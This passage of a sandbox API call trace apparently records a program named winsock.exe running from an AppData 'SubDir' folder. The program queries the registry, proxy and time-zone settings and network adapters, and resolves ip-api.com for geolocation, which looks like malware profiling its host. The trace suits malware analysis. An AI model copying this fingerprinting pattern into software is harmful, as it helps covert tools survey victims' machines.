lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.409] GetCurrentProcess () returned 0xffffffff [0186.409] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3e4) returned 1 [0186.409] GetCurrentProcess () returned 0xffffffff [0186.409] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3e8) returned 1 [0186.426] GetCurrentProcess () returned 0xffffffff [0186.426] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef78 | out: TokenHandle=0x19ef78*=0x3ec) returned 1 [0186.461] GetCurrentProcess () returned 0xffffffff [0186.461] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef8c | out: TokenHandle=0x19ef8c*=0x3f0) returned 1 [0186.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0186.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0186.485] GetCurrentProcess () returned 0xffffffff [0186.485] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efd4 | out: TokenHandle=0x19efd4*=0x3fc) returned 1 [0186.489] GetCurrentProcess () returned 0xffffffff [0186.489] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efe8 | out: TokenHandle=0x19efe8*=0x404) returned 1 [0186.493] QueryPerformanceFrequency (in: lpFrequency=0x4870f0 | out: lpFrequency=0x4870f0*=100000000) returned 1 [0186.494] QueryPerformanceCounter (in: lpPerformanceCount=0x19f3f0 | out: lpPerformanceCount=0x19f3f0*=3382640938316) returned 1 [0186.502] GetCurrentProcess () returned 0xffffffff [0186.502] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efa4 | out: TokenHandle=0x19efa4*=0x408) returned 1 [0186.506] GetCurrentProcess () returned 0xffffffff [0186.506] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efb8 | out: TokenHandle=0x19efb8*=0x40c) returned 1 [0186.522] GetCurrentProcess () returned 0xffffffff [0186.522] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efb8 | out: TokenHandle=0x19efb8*=0x410) returned 1 [0186.525] GetCurrentProcess () returned 0xffffffff [0186.525] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efcc | out: TokenHandle=0x19efcc*=0x414) returned 1 [0186.540] GetCurrentProcess () returned 0xffffffff [0186.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f2d8 | out: TokenHandle=0x19f2d8*=0x418) returned 1 [0186.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e424 | out: phkResult=0x19e424*=0x41c) returned 0x0 [0186.559] RegQueryValueExW (in: hKey=0x41c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e444, lpData=0x0, lpcbData=0x19e440*=0x0 | out: lpType=0x19e444*=0x1, lpData=0x0, lpcbData=0x19e440*=0xe) returned 0x0 [0186.560] RegQueryValueExW (in: hKey=0x41c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e444, lpData=0x2223c90, lpcbData=0x19e440*=0xe | out: lpType=0x19e444*=0x1, lpData="Client", lpcbData=0x19e440*=0xe) returned 0x0 [0186.560] RegCloseKey (hKey=0x41c) returned 0x0 [0186.589] CoTaskMemAlloc (cb=0xcc0) returned 0x601e18 [0186.590] RasEnumConnectionsW (in: param_1=0x601e18, param_2=0x19f2e8, param_3=0x19f2ec | out: param_1=0x601e18, param_2=0x19f2e8, param_3=0x19f2ec) returned 0x0 [0186.610] CoTaskMemFree (pv=0x601e18) [0186.619] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19f0d0 | out: lpWSAData=0x19f0d0) returned 0 [0186.664] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x46c [0186.672] setsockopt (s=0x46c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0186.672] closesocket (s=0x46c) returned 0 [0186.673] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x46c [0186.675] setsockopt (s=0x46c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0186.675] closesocket (s=0x46c) returned 0 [0186.675] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x46c [0186.676] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x474 [0186.677] ioctlsocket (in: s=0x46c, cmd=-2147195266, argp=0x19f2f0 | out: argp=0x19f2f0) returned 0 [0186.677] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x478 [0186.678] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x47c [0186.678] ioctlsocket (in: s=0x478, cmd=-2147195266, argp=0x19f2f0 | out: argp=0x19f2f0) returned 0 [0186.679] WSAIoctl (in: s=0x46c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0) returned -1 [0186.681] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19f008, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0186.693] WSAEventSelect (s=0x46c, hEventObject=0x474, lNetworkEvents=512) returned 0 [0186.693] WSAIoctl (in: s=0x478, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0) returned -1 [0186.694] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19f008, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0186.694] WSAEventSelect (s=0x478, hEventObject=0x47c, lNetworkEvents=512) returned 0 [0186.694] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x484 [0186.695] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x484, param_3=0x3) returned 0x0 [0186.706] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x19f304 | out: phkResult=0x19f304*=0x49c) returned 0x0 [0186.708] RegOpenKeyExW (in: hKey=0x49c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b4 | out: phkResult=0x19f2b4*=0x4a0) returned 0x0 [0186.708] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4a4 [0186.709] RegNotifyChangeKeyValue (hKey=0x4a0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4a4, fAsynchronous=1) returned 0x0 [0186.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b8 | out: phkResult=0x19f2b8*=0x4a8) returned 0x0 [0186.711] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ac [0186.711] RegNotifyChangeKeyValue (hKey=0x4a8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4ac, fAsynchronous=1) returned 0x0 [0186.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b8 | out: phkResult=0x19f2b8*=0x4b0) returned 0x0 [0186.711] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4 [0186.711] RegNotifyChangeKeyValue (hKey=0x4b0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b4, fAsynchronous=1) returned 0x0 [0186.712] GetCurrentProcess () returned 0xffffffff [0186.712] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f2ac | out: TokenHandle=0x19f2ac*=0x4b8) returned 1 [0186.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ebb8 | out: phkResult=0x19ebb8*=0x4bc) returned 0x0 [0186.719] RegQueryValueExW (in: hKey=0x4bc, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x19ebd4, lpData=0x0, lpcbData=0x19ebd0*=0x0 | out: lpType=0x19ebd4*=0x0, lpData=0x0, lpcbData=0x19ebd0*=0x0) returned 0x2 [0186.719] RegCloseKey (hKey=0x4bc) returned 0x0 [0186.739] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x60d4d0 [0186.752] WinHttpSetTimeouts (hInternet=0x60d4d0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0186.753] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x19f2b8 | out: pProxyConfig=0x19f2b8) returned 1 [0186.804] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x19eb30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0186.804] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x19eb30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0186.814] EtwEventRegister (in: ProviderId=0x22269fc, EnableCallback=0x469061e, CallbackContext=0x0, RegHandle=0x22269d8 | out: RegHandle=0x22269d8) returned 0x0 [0186.816] EtwEventSetInformation (RegHandle=0x603740, InformationClass=0x4c, EventInformation=0x2, InformationLength=0x2226998) returned 0x0 [0186.818] GetCurrentProcess () returned 0xffffffff [0186.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef80 | out: TokenHandle=0x19ef80*=0x500) returned 1 [0186.820] GetCurrentProcess () returned 0xffffffff [0186.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef94 | out: TokenHandle=0x19ef94*=0x50c) returned 1 [0186.839] GetCurrentProcess () returned 0xffffffff [0186.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef28 | out: TokenHandle=0x19ef28*=0x510) returned 1 [0186.840] GetCurrentProcess () returned 0xffffffff [0186.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef3c | out: TokenHandle=0x19ef3c*=0x514) returned 1 [0186.843] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f140 | out: lpTimeZoneInformation=0x19f140) returned 0x2 [0186.843] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x19ef94 | out: pTimeZoneInformation=0x19ef94) returned 0x2 [0186.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f078 | out: phkResult=0x19f078*=0x518) returned 0x0 [0186.846] RegQueryValueExW (in: hKey=0x518, lpValueName="TZI", lpReserved=0x0, lpType=0x19f094, lpData=0x0, lpcbData=0x19f090*=0x0 | out: lpType=0x19f094*=0x3, lpData=0x0, lpcbData=0x19f090*=0x2c) returned 0x0 [0186.846] RegQueryValueExW (in: hKey=0x518, lpValueName="TZI", lpReserved=0x0, lpType=0x19f094, lpData=0x222b06c, lpcbData=0x19f090*=0x2c | out: lpType=0x19f094*=0x3, lpData=0x222b06c*, lpcbData=0x19f090*=0x2c) returned 0x0 [0186.847] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eecc | out: phkResult=0x19eecc*=0x0) returned 0x2 [0186.849] RegQueryValueExW (in: hKey=0x518, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f06c, lpData=0x0, lpcbData=0x19f068*=0x0 | out: lpType=0x19f06c*=0x1, lpData=0x0, lpcbData=0x19f068*=0x20) returned 0x0 [0186.849] RegQueryValueExW (in: hKey=0x518, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f06c, lpData=0x222b490, lpcbData=0x19f068*=0x20 | out: lpType=0x19f06c*=0x1, lpData="@tzres.dll,-320", lpcbData=0x19f068*=0x20) returned 0x0 [0186.849] RegQueryValueExW (in: hKey=0x518, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f06c, lpData=0x0, lpcbData=0x19f068*=0x0 | out: lpType=0x19f06c*=0x1, lpData=0x0, lpcbData=0x19f068*=0x20) returned 0x0 [0186.849] RegQueryValueExW (in: hKey=0x518, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f06c, lpData=0x222b4e8, lpcbData=0x19f068*=0x20 | out: lpType=0x19f06c*=0x1, lpData="@tzres.dll,-322", lpcbData=0x19f068*=0x20) returned 0x0 [0186.849] RegQueryValueExW (in: hKey=0x518, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f06c, lpData=0x0, lpcbData=0x19f068*=0x0 | out: lpType=0x19f06c*=0x1, lpData=0x0, lpcbData=0x19f068*=0x20) returned 0x0 [0186.849] RegQueryValueExW (in: hKey=0x518, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f06c, lpData=0x222b540, lpcbData=0x19f068*=0x20 | out: lpType=0x19f06c*=0x1, lpData="@tzres.dll,-321", lpcbData=0x19f068*=0x20) returned 0x0 [0186.852] CoTaskMemAlloc (cb=0x20c) returned 0x61f800 [0186.852] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x61f800 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0186.853] CoTaskMemFree (pv=0x61f800) [0186.853] CoTaskMemAlloc (cb=0x20c) returned 0x61f800 [0186.853] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath=0x61f800, pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080 | out: pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080) returned 1 [0186.858] CoTaskMemFree (pv=0x0) [0186.858] CoTaskMemFree (pv=0x61f800) [0186.859] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4ed0001 [0186.864] CoTaskMemAlloc (cb=0x3ec) returned 0x61f800 [0186.864] LoadStringW (in: hInstance=0x4ed0001, uID=0x140, lpBuffer=0x61f800, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0186.864] CoTaskMemFree (pv=0x61f800) [0186.864] FreeLibrary (hLibModule=0x4ed0001) returned 1 [0186.865] CoTaskMemAlloc (cb=0x20c) returned 0x61f800 [0186.865] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x61f800 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0186.866] CoTaskMemFree (pv=0x61f800) [0186.866] CoTaskMemAlloc (cb=0x20c) returned 0x61f800 [0186.866] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath=0x61f800, pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080 | out: pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080) returned 1 [0186.869] CoTaskMemFree (pv=0x0) [0186.869] CoTaskMemFree (pv=0x61f800) [0186.869] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4ed0001 [0186.878] CoTaskMemAlloc (cb=0x3ec) returned 0x61f800 [0186.878] LoadStringW (in: hInstance=0x4ed0001, uID=0x142, lpBuffer=0x61f800, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0186.879] CoTaskMemFree (pv=0x61f800) [0186.879] FreeLibrary (hLibModule=0x4ed0001) returned 1 [0186.880] CoTaskMemAlloc (cb=0x20c) returned 0x61f800 [0186.880] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x61f800 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0186.880] CoTaskMemFree (pv=0x61f800) [0186.880] CoTaskMemAlloc (cb=0x20c) returned 0x61f800 [0186.880] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath=0x61f800, pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080 | out: pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080) returned 1 [0186.884] CoTaskMemFree (pv=0x0) [0186.885] CoTaskMemFree (pv=0x61f800) [0186.885] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4ed0001 [0186.889] CoTaskMemAlloc (cb=0x3ec) returned 0x61f800 [0186.889] LoadStringW (in: hInstance=0x4ed0001, uID=0x141, lpBuffer=0x61f800, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0186.889] CoTaskMemFree (pv=0x61f800) [0186.889] FreeLibrary (hLibModule=0x4ed0001) returned 1 [0186.891] RegCloseKey (hKey=0x518) returned 0x0 [0186.894] SetEvent (hEvent=0x3f4) returned 1 [0186.911] EtwEventRegister (in: ProviderId=0x222edac, EnableCallback=0x4690646, CallbackContext=0x0, RegHandle=0x222ed88 | out: RegHandle=0x222ed88) returned 0x0 [0186.911] EtwEventSetInformation (RegHandle=0x604030, InformationClass=0x4d, EventInformation=0x2, InformationLength=0x222ed4c) returned 0x0 [0186.916] SetEvent (hEvent=0x3f4) returned 1 [0186.918] GetACP () returned 0x4e4 [0186.955] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x19f26c | out: pFixedInfo=0x0, pOutBufLen=0x19f26c) returned 0x6f [0187.077] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x61fd48 [0187.077] GetNetworkParams (in: pFixedInfo=0x61fd48, pOutBufLen=0x19f26c | out: pFixedInfo=0x61fd48, pOutBufLen=0x19f26c) returned 0x0 [0187.103] LocalFree (hMem=0x61fd48) returned 0x0 [0187.107] CoTaskMemAlloc (cb=0x20c) returned 0x61dc00 [0187.107] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x61dc00, nSize=0x104 | out: lpBuffer="") returned 0x0 [0187.108] CoTaskMemFree (pv=0x61dc00) [0187.108] CoTaskMemAlloc (cb=0x20c) returned 0x61dc00 [0187.108] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x61dc00, nSize=0x104 | out: lpBuffer="") returned 0x0 [0187.109] CoTaskMemFree (pv=0x61dc00) [0187.123] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x584 [0187.125] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x550 [0187.127] GetAddrInfoW (in: pNodeName="ip-api.com", pServiceName=0x0, pHints=0x19f15c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f104 | out: ppResult=0x19f104*=0x5ffda8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x61e2e0*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) returned 0 [0187.165] FreeAddrInfoW (pAddrInfo=0x5ffda8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x61e2e0*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) [0187.169] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x58c [0187.170] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x594 [0187.170] ioctlsocket (in: s=0x58c, cmd=-2147195266, argp=0x19f134 | out: argp=0x19f134) returned 0 [0187.170] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x598 [0187.170] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x59c [0187.170] ioctlsocket (in: s=0x598, cmd=-2147195266, argp=0x19f134 | out: argp=0x19f134) returned 0 [0187.170] WSAIoctl (in: s=0x58c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0) returned -1 [0187.171] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee4c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0187.171] WSAEventSelect (s=0x58c, hEventObject=0x594, lNetworkEvents=512) returned 0 [0187.171] WSAIoctl (in: s=0x598, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0) returned -1 [0187.171] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee4c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0187.171] WSAEventSelect (s=0x598, hEventObject=0x59c, lNetworkEvents=512) returned 0 [0187.172] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x19f118*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x19f118*=0xa78) returned 0x6f [0187.178] LocalAlloc (uFlags=0x0, uBytes=0xa78) returned 0x625350 [0187.178] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x625350, SizePointer=0x19f118*=0xa78 | out: AdapterAddresses=0x625350*(Alignment=0x500000178, Length=0x178, IfIndex=0x5, Next=0x6255f8, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x62556c, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x21, [2]=0x9a, [3]=0x62, [4]=0xc9, [5]=0xd0, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x6254c8*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x19f118*=0xa78) returned 0x0 [0187.207] LocalFree (hMem=0x625350) returned 0x0 [0187.214] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, 